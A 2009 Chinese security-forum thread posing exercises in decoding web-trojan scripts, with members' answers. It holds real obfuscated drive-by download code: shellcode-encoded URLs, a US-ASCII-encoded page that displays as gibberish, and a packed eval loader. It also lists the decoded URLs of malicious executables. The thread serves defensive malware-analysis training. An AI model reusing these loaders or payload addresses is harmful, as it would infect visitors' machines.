瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网马解密中级篇知识点巩固(考核)5.20号更新
networkedition - 2009-5-18 16:10:00
卡卡讲堂之网马解密 初级篇
卡卡讲堂之网马解密 中级篇
卡卡讲堂之网马解密 高级篇(swf网马解密)
卡卡讲堂之网马解密 高级篇(pdf网马解密)
1.Freshow解密工具的详细用法
2.网马解密之——Eval篇
3.网马解密之——Document.write篇
4.网马解密之——Alpha2篇
5.网马解密之——Shellcode篇
6.网马解密之——Base64篇
7.网马解密之——US-ASCII篇
8.浅谈eval解密之——工具篇



引用:
1. http://4t6nhh.6600.org/a/do.css 这个恶意网址是以什么形式加密的,请使用freshow工具解出具体网马地址

  源代码:

GGshen6="%u7468%u7074%u2f3a%u352f%u326c%u386f%u632e%u6d6f%u772f%u6265%u782f%u2e70%u7865%u0065";






引用:
2. http://4t6nhh.6600.org/a/Turl.js 请使用freshow工具解出具体网马地址(最好能写出详细步骤)

  源代码:

document.writeln("<script language=\"JavaScript\">");

document.writeln("ShengFeng = unescape(\"YT7468YT7074YT2F3AYT352FYT326CYT386FYT632EYT6D6FYT772FYT6265YT782FYT2E70YT7865YT0065YT0000\");");document.writeln("<\/script>");








引用:
注:请将解密出的恶意网址以禁用url的形式发帖。


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
AMD1500 - 2009-5-18 18:54:00
http://5l2o8.com/web/xp.exe:kaka2:
networkedition - 2009-5-19 14:08:00
请说出下例恶意网址是以什么方式加密,并将其网马解出。

  http://www.kcrlsb.com/wbTextBox/wob/14.htm

  恶意网址 源代码内容如下:

<hTmL><HeAd><mETA hTtp-EQuIv="Content-Type" contEnT="text/html; charset=US-ASCII" /><tItLe>QQ:50071705 - by:laodIng</tiTLE></heAd><boDY>崐碱矬泸轲艟爫娂殒蜥礤狊蜚姜炯骝犴寰爫娂矬泸轲艟崐俭泸轲魻灬铉踽珏舰梳鲠鱼蜷痿⒕崐肌崐滹沲礤铘蜷翦祛á俭泸轲艟鲠驙衢扉犷癖吹抖犯会殪獒罱堍梏麴函鼢泸祗猱泔懑麾藻嘛黠獐氨钞屮遘⒒窀捣狈贡菇堍睐窀捣狈贡巩屮遘⒒趄鲠驙徜锝ㄤ镢蹴孱舢泸遽翦澎屙孱舁堍镡赍泗堍┅祸狎犱奖会滹弭留趄殁豸濞堍沆狍箝滠堍沆箝浜履苟玫刀盗抄北陌赋镰鞍冒雌貌古扯堍┗鲠驙褰被鲠驙旖徜锂抿遽翦镶赍泗ㄜ⑼殂蝻箫骠吞仍孕堍④ⅸ祸狎犳奖祸狎犾罱堍龄镘⒒鲠驙禚罱堍溻糗⒒鲠驙犷杰Ⅱ遽碥⒒鲠驙缃被鲠驙狍结滹蝈狒屣怅邈舁祛瞵堍堍┗鲠驙杞被飚橡孱ㄜ⑶旁堍殪獒瞵癌圾盱孱洙┗狍褰被鲠驙罱被狍疱瞑┗狍蜷翦盱弩痫铙迓镤会螽筢鲥麸骈戾傅繁饭惫┗狍祜箦ī祸狎狊桢祆结滹蝈狒屣怅邈舁堍予屐飚琉痨殂狒轱钴堍堍┗箬屐飚予屐戾沲翦傅繁饭惫④堍堍疱钴癌积汜翥瑷濠患泸轲糗劲┗崐緧娂泸轲艟崐俭泸轲魻豉疱舰翦筱蜷痿⒕骢钽糸镱犻铋舁麪滹沲礤铘蜷翦áⅸ积鏖钿秣铎镝錉綘轭轸患泸轲艟崐€</BoDy></hTmL>


帅哥阿福 - 2009-5-19 14:18:00
US-ASCII加密特征
http://www.kcrlsb.com/wbTextBox/wob/013.exe
艾玛 - 2009-5-20 14:45:00
Malzilla

解第二题

networkedition - 2009-5-20 17:28:00
一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。

window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="YTloveSF=Yes;path=/;expires="+expires.toGMTString();
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('28 G;H = 29[\'27\']("%1P"+"E" +"%1P"+"E%1r"+"W%1F"+"D%1K"+"J%1k"+"x" +"%14"+"z%1s"+"10%1G"+"D%14"+"5%1j"+"10" +"%1p"+"N%1R"+"h%1Z"+"b%1b"+"d%1c"+"K" +"%1l"+"7%1E"+"Z%1V"+"3%19"+"O%1Y"+"1" +"%23"+"g%1m"+"Y%1F"+"T%1u"+"U%1u"+"D" +"%14"+"6%1x"+"S%18"+"D%1M"+"i%1e"+"q" +"%20"+"1%15"+"D%14"+"D%1W"+"M%1D"+"y" +"%1z"+"t%1A"+"u%1w"+"9%1y"+"t%1o"+"0" +"%1t"+"e%1h"+"o%1H"+"s%13"+"s%1U"+"b" +"%14"+"r%1i"+"g%18"+"z%1n"+"D%1M"+"4" +"%1e"+"v%1M"+"I%16"+"g%17"+"W%1n"+"D" +"%1N"+"c%1I"+"g%1n"+"D%1Q"+"f%1O"+"L" +"%1a"+"j%22"+"X%26"+"B%26"+"12%24"+"A" +"%1L"+"2%1f"+"8%26"+"f%1Q"+"P%1T"+"k" +"%1d"+"d%1C"+"a%1B"+"V%26"+"12%1M"+"12" +"%1f"+"n%1N"+"11%1S"+"l%1Z"+"b%1q"+"m" +"%23"+"l%1q"+"6%1X"+"12%1T"+"p%25"+"F" +"%1a"+"C%1q"+"V%26"+"12%1L"+"12%15"+"X" +"%1g"+"A%1v"+"6%1X"+"12%1J"+"L%21"+"R" +"%22"+"w%26"+"g%26"+"12%26"+"l%22"+"P" +"%26"+"Q%26"+"12");',62,134,'00|03|04|08|0c|20|24|28|2c|2e|2f|33|34|36|3a|3c|40|41|4b|4e|50|52|53|54|55|5d|5e|64|65|6c|6f|70|73|74|75|78|83|84|8a|8b|90|98|YTdown|YTdown3|ad|b3c|be|bf|c5|c9|cb|d0|d7|d8|dd|df|e7|e8|eb|ec|ef|f2|f5|fc|ff|u00|u03|u04|u08|u09|u0c|u0d|u0e|u0f|u14|u1a|u1c|u24|u2c|u2e|u30|u33|u35|u38|u3b|u40|u43|u49|u53|u54|u56|u5c|u5e|u62|u64|u66|u6c|u6d|u6e|u6f|u70|u72|u74|u75|u76|u78|u7c|u7e|u8|u83|u8b|u8d|u8e|u90|u95|uad|uba|ubf|uc0|uc1|uc3|ud0|uda|udb|udd|ue2|ue8|ueb|uec|ufe|uff|unescape|var|window'.split('|'),0,{}))
var YTavpdown="%u7468%u7074%u2F3A%u352F%u326C%u386F%u632E%u6D6F%u772F%u6265%u782F%u2E70%u7865%u0065%u0000";
var YTdown=YTdown3+YTavpdown;
}


vistalong - 2009-5-20 22:35:00
第二个可以利用freshow的replce功能(用%u替换YT)
最后利用shellcode解密
最后解密结果:hxxp://5l2o8.com/web/xp.exe
艾玛 - 2009-5-21 15:50:00


引用:
原帖由 networkedition 于 2009-5-20 17:28:00 发表
一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。[code]window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();



ty88 - 2009-5-21 18:29:00


引用:
原帖由 networkedition 于 2009-5-20 17:28:00 发表
一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。[code]window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();


获取YTdown就可以了
於陵闲云 - 2009-5-21 21:35:00


引用:
原帖由 networkedition 于 2009-5-20 17:28:00 发表
一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。[code]window.onerror=function(){return true;}
if(document.cookie.indexOf("YTloveSF=")==-1)
{

var expires=new Date();


%u7468%u7074%u2F3A%u352F%u326C%u386F%u632E%u6D6F%u772F%u6265%u782F%u2E70%u7865%u0065%u0000

freshow中两次esc即可得到病毒的地址http://5l2o8.com/web/xp.exe
Bearboy - 2009-5-28 22:05:00
第3个是不是http://www.kcrlsb.com/wbTextBox/wob/013.exe\
高博高博高博 - 2009-6-8 20:23:00
rencai
是昔流芳 - 2009-6-28 7:28:00
1. http://4t6nhh.6600.org/a/do.css 这个恶意网址是以什么形式加密的,请使用freshow工具解出具体网马地址
答:应该是Shellcode加密  http://5l2o8.com/web/xp.exe
2.[http://4t6nhh.6600.org/a/Turl.js 请使用freshow工具解出具体网马地址(最好能写出详细步骤)
答:http://5l2o8.com/web/xp.exe

YT7468YT7074YT2F3AYT352FYT326CYT386FYT632EYT6D6FYT772FYT6265YT782FYT2E70YT7865YT0065YT0000


按照Shellcode解密方法解密
3.请说出下例恶意网址是以什么方式加密,并将其网马解出。
http://www.kcrlsb.com/wbTextBox/wob/14.htm
答:US-ASCII  http://www.kcrlsb.com/wbTextBox/wob/013.exe
4.一个迷惑人的eval加密,恶意网址地址:http://kuaile4444.3322.org/a/ggvod.js,大家尝试来解一下。
答:http://5l2o8.com/web/xp.exe
只看

var YTavpdown="%u7468%u7074%u2F3A%u352F%u326C%u386F%u632E%u6D6F%u772F%u6265%u782F%u2E70%u7865%u0065%u0000";


就行了。
gtyre2 - 2009-7-2 16:25:00
巩固学习。。。
零度的穷浪漫 - 2009-8-3 8:25:00
1.是shellcode形式,网马地址为http://5l2o8.com/web/xp.exe
Log is generated by FreShow.
[wide]http://4t6nhh.6600.org/a/do.css
    [object]http://5l2o8.com/web/xp.exe
2.也是shellcode解密,将YT替换成%u即可解出http://5l2o8.com/web/xp.exe
3.US-ASCII加密,解出为http://www.kcrlsb.com/wbTextBox/wob/013.exe
Log is generated by FreShow.
[wide]http://kuaile4444.3322.org/a/ggvod.js
    [object]http://www.kcrlsb.com/wbTextBox/wob/013.exe
4.找出其中的%u7468%u7074%u2F3A%u352F%u326C%u386F%u632E%u6D6F%u772F%u6265%u782F%u2E70%u7865%u0065%u进行解密得http://5l2o8.com/web/xp.exe\xH
Log is generated by FreShow.
[wide]http://kuaile4444.3322.org/a/ggvod.js
    [object]http://5l2o8.com/web/xp.exe\xH
1
查看完整版本: 网马解密中级篇知识点巩固(考核)5.20号更新